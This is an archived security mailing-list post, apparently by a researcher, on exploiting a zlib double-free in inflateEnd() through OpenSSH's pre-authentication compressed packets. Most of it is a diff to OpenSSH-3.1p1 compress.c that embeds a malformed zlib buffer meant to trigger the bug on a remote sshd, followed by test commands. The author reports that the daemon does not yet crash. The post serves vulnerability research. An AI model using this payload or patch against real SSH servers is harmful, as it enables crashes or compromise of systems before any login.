exploiting the zlib bug in openssh

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

 

A bug was found in the zlib compression library which causes inflateEnd() to 
incorrectly free the same chunk of memory twice when given a deformed chunk 
of compressed data. A PNG image was discovered  (not by me) which triggers 
this flaw, it is attached. 

OpenSSH uses the zlib library to compress data when the -C option is passed 
to it. With version 2 of the protocol, it is possible to send 
compressed/encrypted messages to the remote daemon before having to 
authenticate (just after key exchange). This is done using SSH2_MSG_IGNORE 
packets in the kex2() function of sshconnect2.c.

The attached patch to libpng-1.2.1 causes pngtest to dump out the contents of 
the buffer it passes to inflate(). This is used with the attached PNG file to 
obtain the buffer the OpenSSH client needs to send. The buffer size has been 
tweaked in libpng to match the one used in OpenSSH-3.1p1 (4096 bytes). The 
pngtest program will SEGV after dumping out this buffer from the PNG file.

I patched the OpenSSH client to send this corrupt zlib buffer after the key 
exchange, the inflate() call on the remote end is returning the correct value 
indicating that the buffer did what it was supposed to (Z_MEM_ERR or -4), but 
the remote daemon is NOT crashing during the fatal_cleanup() and inflateEnd() 
calls.  Taking the same buffer and sticking it into the inflate() call of 
another application causes the desired SEGV and possible path to 
exploitability, so why isn't OpenSSH crashing?

The attached patch applies to OpenSSH-3.1p1, if you run the daemon code it 
will spit out the recieved buffer (to make sure it made it across ok) and 
some other debugging information. The recommended command line to test this:

# ./sshd -d -d -d
# ./ssh -2 -C -v -v -v root@127.0.0.1

If for some reason you can't access the attachments, you can find copies of 
them on my web site at the following URL:

http://www.digitaloffense.net/openssh_zlib/

diff -u -r openssh-3.1p1/compress.c openssh-3.1p1-zlib/compress.c
--- openssh-3.1p1/compress.c	Tue Mar 12 03:33:02 2002
+++ openssh-3.1p1-zlib/compress.c	Tue Mar 12 03:33:03 2002
@@ -24,11 +24,277 @@
 static int compress_init_send_called = 0;
 static int compress_init_recv_called = 0;
 
+
+unsigned char *boomij = 
+"\x78\xda\xed\x99\x5d\x6c\x1c\x57\x15\xc7\x7f\x77\x76\x76\x77\xd6\xf1"
+"\xc6\xde\xc6\x4e\x76\x63\x37\x8e\x93\xd6\xa4\xa1\x7d\x88\x42\x91\xf2"
+"\xd0\x22\x54\x44\x41\xa8\xa0\x56\x54\xad\xe8\x87\xa2\xd2\xa8\xbc\xa0"
+"\xf2\x51\x09\x41\x79\xaa\x68\xa5\x82\xe0\x11\x29\x95\x10\x42\x42\x20"
+"\x8a\x04\x52\x1f\x88\xaa\x3e\x10\x11\xd1\xa0\x14\x54\x62\x27\xb5\xf3"
+"\xb9\x89\xbf\xbf\xe2\xd9\x5d\xdb\x3b\x77\x77\x66\xee\xe5\x61\xef\xec"
+"\x8e\x37\x4e\xb2\x11\x2a\xaa\x44\xae\x75\x35\xb3\xe3\x99\x3b\xe7\x7f"
+"\xce\x0b\x9c\xfb\xbf\x77\xe0\x4e\xbb\xd3\xee\xb4\x3b\xed\x4e\xfb\x7f"
+"\x6e\xe2\x13\x6e\x93\xfe\xa4\x00\x10\xb7\x30\xa8\x13\x3b\xf4\xff\x12"
+"\x80\xe8\xc0\x78\xbd\xc9\x7d\xe2\x06\x86\xeb\x1b\x81\xb0\x3f\x26\xc3"
+"\x45\x07\x0e\xda\xcc\x78\xb1\x09\x85\xf4\xcd\x40\x74\x04\xe0\x77\xdf"
+"\xf9\xa6\x52\x4a\xa3\xb5\x22\x54\x21\xf5\x40\x51\x57\x0a\x85\x40\x08"
+"\x0b\x61\x09\x84\x48\xa0\xcd\x5f\x18\x28\xae\x79\x1e\x4a\xc0\x36\x27"
+"\x43\x22\x99\x22\x61\xdb\x24\xec\x04\x09\xcb\x42\xfb\x75\xfc\x5a\x0d"
+"\xdf\xf7\x09\x94\x42\x69\x4d\x18\x2a\xfc\x20\xa4\x2a\x3d\xdc\xaa\x44"
+"\xa9\x90\x1e\x3b\x01\xc0\xcf\x8f\x1d\x77\x00\x65\xfa\x06\x10\x1d\x01"
+"\x08\x42\x05\x1a\x42\xad\x09\x02\x45\x18\x2a\xf6\x7f\xe3\x88\xc8\x65"
+"\x73\x38\xdd\x4e\xa3\xdb\x0e\x32\x90\x48\x29\x41\x36\x9e\xfb\xc1\xcb"
+"\x2f\xe9\x4f\xef\xe8\xe3\xf9\xd7\x5e\x15\x8e\xe3\x98\xc1\x5a\xe3\x4a"
+"\x29\x5b\x3f\x4a\x25\xe8\xed\x05\xe0\x95\x23\x2f\x68\xb4\xcf\xca\x6c"
+"\xb0\x33\x34\xe7\x2a\x0e\xc0\xea\x08\x80\xd2\xf8\x61\x48\x18\x86\x28"
+"\xad\xc4\xd0\x13\xcf\x89\x7c\x3e\xcf\xea\xea\x2a\xa1\x08\x63\x37\x36"
+"\xba\x0c\x24\x32\x90\xe4\xef\xd9\x27\x5c\x4f\x36\x8d\x2e\x9d\x38\x79"
+"\x7d\xec\x03\xe0\x42\x91\xb9\xb7\xdf\xc6\x31\x80\xbe\xfa\xdc\x61\xe1"
+"\x85\x8a\xd5\xd4\x16\x91\xca\x6d\xe3\x73\x87\x0e\x75\x99\x27\xac\x58"
+"\xbf\x0d\x00\x61\x48\xa0\x42\x7c\x15\x72\xf7\xd7\x9f\xa3\x50\x28\x90"
+"\x4a\xa5\x28\x5e\x29\x52\xaf\xd4\x91\x52\xb6\xbc\x1f\xb4\x80\x00\xd4"
+"\x03\xd5\xf2\xfa\x9a\x44\x96\x4a\x94\x4e\x9e\x44\xce\x97\x1a\x5e\x07"
+"\xe4\xdd\x05\x88\xa2\x61\xee\xfd\xf2\x63\x5f\x13\x03\xdb\xfb\xf5\x6b"
+"\x47\x7f\x2d\x56\x56\x57\x1f\x36\x00\x6c\x20\x11\xb7\xed\xb6\x00\x7c"
+"\xea\xe9\x23\x62\x68\xc7\x10\xb6\x6d\x13\x86\x21\x6e\xc5\x65\x7e\x79"
+"\xbe\x65\xa0\x39\x46\x11\x68\x66\xaa\x03\xf2\x83\x0f\xa1\xdb\x41\x5e"
+"\x18\x47\xce\xcf\x23\x8b\xe3\x94\xc6\xc6\x37\xd0\x29\x72\x04\xc0\x70"
+"\x10\xf0\xf8\x17\xbe\x24\x5e\x3c\x7c\x98\xfe\xee\xee\x87\x8c\xf1\x5d"
+"\xc0\x16\x20\x1d\xd9\xde\x51\x0e\xf8\x4a\xa1\x94\x22\x93\xcc\x70\x79"
+"\xf2\x32\x95\x95\x0a\xee\xaa\x4b\xad\x56\xa3\x5e\xad\x6f\xf0\xb8\x0c"
+"\x24\x8e\xed\xc4\xca\x88\x86\x00\x9c\x07\x0f\xe0\x04\x0d\x43\x9d\x07"
+"\x1a\xf7\x3b\x51\x1e\xd8\x90\x7b\xfc\x49\xa4\xd3\xc8\xa5\x6e\xcf\x63"
+"\x8b\xeb\x32\x7d\xfc\x38\x9f\xd9\xda\xad\x7f\xf4\xce\x3b\xbf\x00\x72"
+"\x06\x80\x06\x96\x81\x6b\x80\xdf\x09\x00\xe1\x87\x0d\x00\x4c\x15\xd9"
+"\x02\x64\xb4\x47\x8f\xed\xe0\x75\x69\xb2\xeb\xeb\xc8\x0b\xe3\xe0\x38"
+"\xc6\x83\x40\x20\xf1\x22\x00\x5a\x21\xa7\x8a\x26\x37\xda\x12\x97\xd6"
+"\xbd\x19\x40\x5e\x90\x78\xbe\x4f\xff\xec\x2c\x6b\xd5\x2a\xcb\xf3\xf3"
+"\x9c\x29\x2d\x01\x6c\x05\x0a\xc0\x5d\x80\x6f\x02\x5b\xb9\x15\x80\x66"
+"\x4d\xf6\x83\x10\xa5\x43\x7a\x1f\x38\x40\x6f\xe4\xdc\xb8\x1d\x0e\x0d"
+"\xaf\x4b\x89\x3b\x37\xc7\xc4\x99\x09\x76\xef\xdb\xdd\x28\x19\x1a\x64"
+"\x36\xc7\x87\xe3\xe3\x1c\x78\xe0\x00\xbd\x06\x68\x14\x2d\x80\x9c\xa9"
+"\x60\x00\xb5\xbf\xbf\x4f\xe8\xfb\xac\x95\xcb\x8c\x97\x5d\xed\x35\xea"
+"\x4d\x01\xd8\x03\x64\x81\x55\x60\xce\x50\x48\x77\x14\x81\x40\x85\x84"
+"\xaa\x31\x92\x63\x3b\x0d\xe2\x39\xa6\xe2\x44\x1e\x35\x23\x4d\x9c\x99"
+"\x40\x2e\x7d\x40\xee\xfe\x3c\x47\x8f\x1e\xe5\x1f\xef\xfd\x59\xfc\xf5"
+"\xed\xb7\x38\x75\xea\x4f\x04\xcf\xfc\x8c\x07\x0f\x3d\xd8\xa0\x91\xd3"
+"\xa2\x99\x0c\x24\x9e\xe7\x61\xcf\xcf\xa3\x2a\x65\x56\xaf\x5d\x63\x71"
+"\x75\x95\x29\x15\x50\xf7\x03\x80\x01\x43\x21\x80\x2a\x50\x06\xea\x37"
+"\xcb\x81\xf8\xac\x68\xd5\xc3\x10\xa5\x8c\xd1\xb1\x92\x19\x79\x2d\x5e"
+"\xd3\x77\xef\xdb\xcd\x84\x94\x14\xa7\x25\xaf\x3f\xf6\x18\xd9\x7a\x55"
+"\x3f\xfb\xf2\xf7\xc5\x62\xa2\x07\xcf\xf3\x28\x5f\x2b\x93\x4e\xa7\x5b"
+"\xcf\x46\x05\xa0\x56\x23\xbc\x70\x01\xcf\x75\x71\x5d\x97\x4a\xa1\x80"
+"\x5c\x9e\x17\xeb\x9e\xd4\xc0\x4e\xc3\xb2\x65\xe3\x7d\x37\x7a\xd2\xea"
+"\x40\x1a\x08\x3f\x50\x04\x4a\x35\x93\x33\xaa\x18\xf1\xe4\x8d\xae\x17"
+"\x72\x05\xf6\xed\xdb\x87\x94\x92\x9d\x3b\x77\xa2\xb4\x46\x59\x8a\xed"
+"\x77\x6d\xe7\x72\xf1\x32\xd3\xd3\xd3\x1b\x9c\xe0\xf9\x1e\x9e\xef\x11"
+"\x8e\x8d\x22\x2c\x8b\xf2\xc2\x02\x15\xcb\x42\x6e\xdb\xc6\xba\xac\xeb"
+"\xf5\x5a\x1d\xa0\xcf\x4c\x64\xae\x01\xe1\x45\xf4\xb6\x3b\xd1\x35\x81"
+"\xd6\x02\xad\x5b\xbc\x95\x6d\x62\x24\x56\x46\xa5\x94\xe4\x72\xb9\x66"
+"\x44\x02\x15\x8a\x33\xff\x3c\xc3\xb9\xe2\x39\x76\xee\xd8\x89\x6d\xdb"
+"\xb8\xae\xbb\x21\x99\x53\xcb\x8b\x74\xcb\x1a\xa5\xa9\x29\x4a\xe5\x32"
+"\x0b\x85\x02\x0b\x73\x73\xac\x4b\x49\xad\xee\x0b\x33\xfb\x96\x81\x05"
+"\x93\x03\xb7\x94\x12\x22\x36\x4f\x58\x4a\x6b\xad\x1b\x39\x20\xe2\xd4"
+"\x71\x6c\xa7\x65\xbc\xdd\xba\xee\xf9\x1e\xbd\x7d\x0d\x59\x60\x09\xa1"
+"\x0b\x85\x82\xe8\xeb\xef\x63\xff\x7d\xfb\x11\x49\x81\x08\x05\x9e\xef"
+"\x91\xc9\x64\xf0\x16\x16\x48\xcb\x2a\x9e\x94\xb8\x8b\x8b\x5c\x11\x82"
+"\xf3\x2b\x2b\x8d\x12\xed\xfb\x08\x21\x34\x50\x02\x66\x81\xc5\x88\xfb"
+"\x9d\x68\xa1\x66\x1e\x84\xa1\x6a\xd4\x73\x33\x17\x36\x75\x8f\xa9\xf9"
+"\x32\x68\xd0\xc9\xb1\x1d\x5c\xcf\x6d\xfe\x06\x48\x58\x16\xf7\xde\x7b"
+"\x2f\xe9\x2d\x69\x12\x89\x44\x23\x4a\xa1\x24\x93\xcc\xb0\x52\x59\xc1"
+"\x99\x98\x20\xd5\xdb\xcb\x54\xb1\x88\x5b\xa9\x30\x8e\x60\xd5\xf3\x48"
+"\x26\x93\xd8\x09\x8b\x64\xd2\x06\x98\x32\xdc\x97\x31\x19\x2e\x3a\xcd"
+"\x01\x2b\x54\x9a\x50\xe9\xd6\x04\xe5\x5c\x2f\xc8\xa2\xff\x95\x96\x4b"
+"\x4c\xfc\x7b\x82\xd2\x72\x29\x8a\x00\xe5\xf5\x32\xa3\xa3\xa3\x78\x9e"
+"\xd7\x00\x67\x37\xa2\xd4\x3d\xb5\x40\x2e\x9f\x67\xf1\xec\x59\xdc\x95"
+"\x15\x4e\x7b\x92\x52\xbd\x8e\x6d\xdb\xf4\xf4\xf4\xd0\xdd\x95\x21\x9b"
+"\xc9\x60\x3c\xef\xb5\x1b\x7f\x2b\x00\xcd\x9b\x42\xad\xd0\x4a\x37\x3c"
+"\xee\x38\x2d\xd1\x16\x4d\xfd\x31\x01\x77\xe5\xca\x15\xe4\xd2\x07\xec"
+"\xe8\xd1\xbc\xf9\xe6\x9b\x3c\xfb\xd2\x8b\xe2\xc4\xb1\x3f\xf2\xce\xaf"
+"\xbe\xcb\xe9\xd3\xa7\x49\xa7\xd3\x0d\xde\x4b\x49\x4f\x3a\xc9\xca\xa5"
+"\x4b\x2c\x4d\x4e\x32\x5b\xa9\x70\x51\x58\x64\xb7\x66\x19\x18\x18\xa0"
+"\x50\x28\xb0\xc5\xc9\x88\x74\x32\x85\x31\x3e\xb2\x37\xbe\xd6\x10\x76"
+"\x67\xab\x29\x8d\x16\xe2\x3a\xc5\x19\xe7\x3f\x80\xe7\x79\xe4\xf3\x79"
+"\x46\x2b\x43\xfc\xeb\xdc\x0c\x3f\xf9\xed\x0b\x6c\xf7\xd6\xf5\x53\xcf"
+"\x7f\x4b\xf4\x6c\x09\xf0\x3d\x9f\xc9\xcb\x93\xa4\x52\x29\xb6\x16\x2f"
+"\xa2\xb6\x66\x59\x98\x98\xe0\x5a\xa9\xc4\x29\xdf\xc7\x4a\x67\xc8\xf5"
+"\xe4\x18\x1c\x1c\x44\x08\x81\x65\x59\x5a\x58\x62\x03\x1b\x62\x47\xeb"
+"\x46\x11\xd0\xed\xe7\x02\x81\x40\x6f\xd0\x38\x04\x34\xa9\x10\x07\xd3"
+"\xdb\xdb\xcb\xde\x81\xbd\xac\xad\xad\xe1\xa4\xd3\x58\x35\x9f\xe5\xe5"
+"\x65\xd6\xec\x21\x4a\xe5\x12\x3a\xad\xc9\xcc\x4f\x93\x1b\x1c\xe0\xea"
+"\xfb\xef\x53\x29\x97\xb9\xb8\xb6\x4e\x29\x91\xa0\xaf\xbf\x8f\x91\x91"
+"\x11\xf2\xf9\x3c\x89\x44\x02\xcb\x42\x88\xcd\x0b\x4b\x73\x49\x6a\xdf"
+"\x62\x11\xad\xa3\x33\xad\x75\x6b\xf2\xb1\xc1\xe9\x6e\x48\x82\x4c\x83"
+"\xa3\x2d\x05\xea\xc0\xb6\x6d\xdb\xa8\xab\x3a\x3d\xe7\xcf\x53\xad\xd7"
+"\xb9\x7a\xf5\x2a\xca\x52\xec\xdc\xbd\x93\x7c\x60\xe1\x9e\x3d\xcb\x74"
+"\x2a\x45\x79\x61\x81\xb9\x95\x15\xce\x02\xd9\xee\x2c\xc3\x43\xc3\x0c"
+"\x0e\x0c\x12\xe8\x00\x21\x04\x5a\xa3\x8d\x09\x89\x98\xd7\x6f\x99\x03"
+"\xed\x8b\x70\xdd\x98\x03\xb4\x68\x1a\x6f\x54\xa3\xe3\x38\xad\xf3\x78"
+"\xef\x76\xd8\x7d\xcf\x6e\xba\xba\xba\x48\x25\x6d\xf6\xdd\xbf\x8f\x83"
+"\x9f\x3d\xc8\xc8\xd0\x10\xf5\x8b\xe7\x79\xf8\xd5\x57\xa9\x7b\x1e\x4b"
+"\xae\xcb\x44\x10\x62\x6d\xe9\x26\xbf\x23\xcf\xc0\xc0\x00\xe9\x54\x1a"
+"\x11\xf9\x5d\x8b\x38\x1f\xac\x58\x12\x5b\x37\xcb\x81\xeb\xa2\xa0\x85"
+"\x46\x6b\xb4\x63\x3b\xa2\xa1\xe3\x24\x4e\xb7\xd3\x28\x6a\x41\xe3\x37"
+"\x40\x2e\x9b\x6b\x46\x29\x93\xcc\x60\xdb\x36\x49\xdb\x66\xef\xd0\x5e"
+"\x72\xb9\x1c\x0b\x27\xfe\x4a\xdf\xf0\x30\xc7\xdf\x78\x83\x5d\x8f\x3c"
+"\xc2\x47\xee\x0a\x33\x57\xae\xd2\xdf\xdb\xcb\x9e\x3d\x7b\xc8\xe5\x72"
+"\x58\x56\xcb\xa7\x09\xd1\xf4\xa7\x68\x03\xa1\x6f\x36\x13\xeb\xf6\x64"
+"\xd6\x5a\xa3\xf4\xc6\x1d\x86\x48\x8c\x49\x29\x37\x48\x0c\x02\x03\xc4"
+"\x94\x57\xad\x35\x99\x4c\x86\xd5\xd9\x19\x7a\xb3\x59\xe6\x47\x47\x99"
+"\x3e\x77\x8e\x33\x63\x63\x1c\xaf\xfb\x64\xb3\x59\x86\x76\x0d\x31\x38"
+"\x30\x48\xba\x2b\x4d\x6d\xbd\xd6\xa2\x82\x40\xc4\xec\x51\x9b\xed\x4e"
+"\x74\x12\x01\xa5\xb5\x16\x81\x52\x7c\xef\x99\x27\xf5\xc8\x43\x8f\xdc"
+"\xee\x5e\x92\xf8\xe9\x8f\x5f\xe1\xe9\x43\x0f\x91\xef\xef\x67\x7a\x74"
+"\x94\x25\xd7\x65\x54\x6b\x96\xc3\x90\xac\x9d\xa0\x5a\xab\x32\x35\x3b"
+"\x85\x35\xbf\x91\xd1\x8d\x49\x58\x08\xa3\x83\xc2\xd8\xae\x04\x9d\x68"
+"\xa1\x26\xfb\x94\x42\xaf\xfb\x8a\x72\xdd\xe7\xc4\xbb\xc7\x74\xdb\x5b"
+"\x88\x6a\x45\x93\xba\x5a\x10\x6a\x85\x63\x27\xb8\xab\xcb\x61\x6b\x2a"
+"\xcd\xae\xe1\x61\x31\x79\xea\x14\x4b\xae\xcb\x54\x75\x5d\x7f\x54\xf5"
+"\xf0\x03\x9f\xb0\xba\xc6\x25\x6f\x9d\xa9\xf1\xb3\x80\x6e\x6c\x1c\x28"
+"\x05\x08\x72\x09\x11\xf1\x20\xf2\x7e\xd8\xb6\xbd\x72\x43\x00\x11\xc7"
+"\x34\xa0\x84\xb8\xc9\x64\x27\x84\xc6\x84\x3a\x16\x6f\x21\x04\x3a\x7a"
+"\xfb\xe7\x47\xee\x63\xa5\x58\x64\xf2\xc2\x05\x26\xab\xeb\x7a\xc2\x49"
+"\x93\xf4\x7d\x12\x09\x21\xd2\xa9\xa4\xb6\x13\x96\x68\x2b\xdf\x02\xb4"
+"\xd6\x2d\xfa\x47\xba\x37\x1e\x09\xdd\x49\x04\x34\xc0\x5b\xef\x1e\xcf"
+"\x02\x3d\xc0\x0e\x60\xd0\x1c\xb7\x9a\xc5\xb5\x0d\x24\x4d\xa9\xb3\x63"
+"\x65\xce\x07\xaa\x5f\xdc\xbf\x7f\xfb\x9e\x27\x46\xbe\xfd\xd1\x7b\xef"
+"\x31\x3e\x37\x77\xf9\x97\x63\x63\xef\x02\xdb\x80\x5e\xf3\x9e\xb2\x11"
+"\x6b\x9e\x31\x2e\x5a\xb0\x5c\x03\x96\xcc\xd2\x31\x30\xe3\xc5\x81\xa8"
+"\x4e\x56\x64\xda\xdc\x18\x00\xeb\x66\xc0\xba\x39\x76\x01\x29\x63\x7c"
+"\x74\x8c\xb6\x3d\x12\x91\x03\x8e\x3c\xfa\xe8\x0b\x33\x63\x63\x4c\xce"
+"\xcc\x94\x8e\x15\x8b\xbf\x31\xe3\x45\x12\x39\x34\x12\x79\xda\x08\xb5"
+"\x30\x02\x6e\x7a\xc5\x00\x93\xe6\x7a\x3d\x06\x44\x75\x12\x81\xf8\x9c"
+"\x10\x95\x87\x3a\xb0\x16\x33\x3c\xea\x51\x24\x22\x20\xd6\x53\x07\x0f"
+"\xde\x57\x9f\x9b\x1b\xbe\x34\x3b\xbb\xf2\xfb\xf1\xf1\x1f\x16\xd7\xd6"
+"\x6a\x66\x79\x18\x9a\x31\x2a\xc0\xa4\x51\x9a\x91\x58\xf3\x63\xdd\x33"
+"\xef\x93\x34\x8b\x76\xcb\xf8\xdb\x89\x40\xd4\x6a\x31\x2f\x45\x86\xc6"
+"\xa3\x60\xc7\x80\x58\x5f\x19\x19\x39\x5c\x29\x97\xf9\xdb\x95\x2b\xaf"
+"\x8f\x97\x4a\x33\xc6\xf8\x2e\x33\xe6\xaa\xd1\xf8\x33\xc0\x8a\x19\x33"
+"\xa2\x86\x1f\xa3\x4d\xdd\xbc\x37\xea\xb7\x4d\x21\xd1\x06\x24\x68\x03"
+"\xa7\x62\x2f\xb3\xe3\x7d\xbd\x52\x99\x1f\x9b\x99\xf9\xc3\x5f\x26\x27"
+"\x4f\x02\xdb\xcd\xba\xd6\x32\x9e\x5d\x04\xae\xc6\x74\xbe\x6a\x4b\xd2"
+"\x76\x10\x71\xfa\xe8\x96\x4e\xeb\x6c\xcb\x7c\xc3\x22\xdf\xf4\x44\x4c"
+"\xa3\xd8\xb1\xf3\x64\x6c\xfb\x2f\xba\xbe\x15\xd8\x65\xb6\x47\x32\x26"
+"\x9f\x26\x4d\x04\xd6\x8c\x31\x41\x5b\xb9\x8c\x7a\x10\x8b\x4e\xd0\x0e"
+"\xa0\x93\x6d\x15\xbd\xc9\xb9\x8e\xbd\xc8\x32\x83\x46\x00\x6a\x6d\xc2"
+"\xab\x2b\x96\xb4\xab\xa6\x00\xcc\x1b\xcf\x57\x8d\x71\xed\x33\x6d\x3c"
+"\xb2\xed\xe7\xfa\xb6\xb7\xd7\xdb\xf4\x87\x8a\xbd\xb0\xfd\xa3\x84\xb5"
+"\x49\xd4\x74\xac\xa2\x94\x4c\x79\x5c\x30\xd7\x54\x5b\x8e\xc5\x9b\xda"
+"\x64\x4b\x5d\xfd\xb7\x5f\x68\x74\x5b\x5e\xb4\x7f\x1a\x0a\x6f\xf0\x95"
+"\xc6\x8d\x51\x61\xc5\x50\x48\xdd\xe4\xd3\xd3\xcd\x8e\x1f\xfb\x37\xb2"
+"\xf6\x31\xad\x58\x79\x0d\x4c\x32\xea\x5b\x7c\xf4\xd3\x7c\xc2\x9a\x68"
+"\x5b\xcf\xde\xea\xc3\x5e\xc7\xed\x3f\x20\xc4\x9e\xae\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
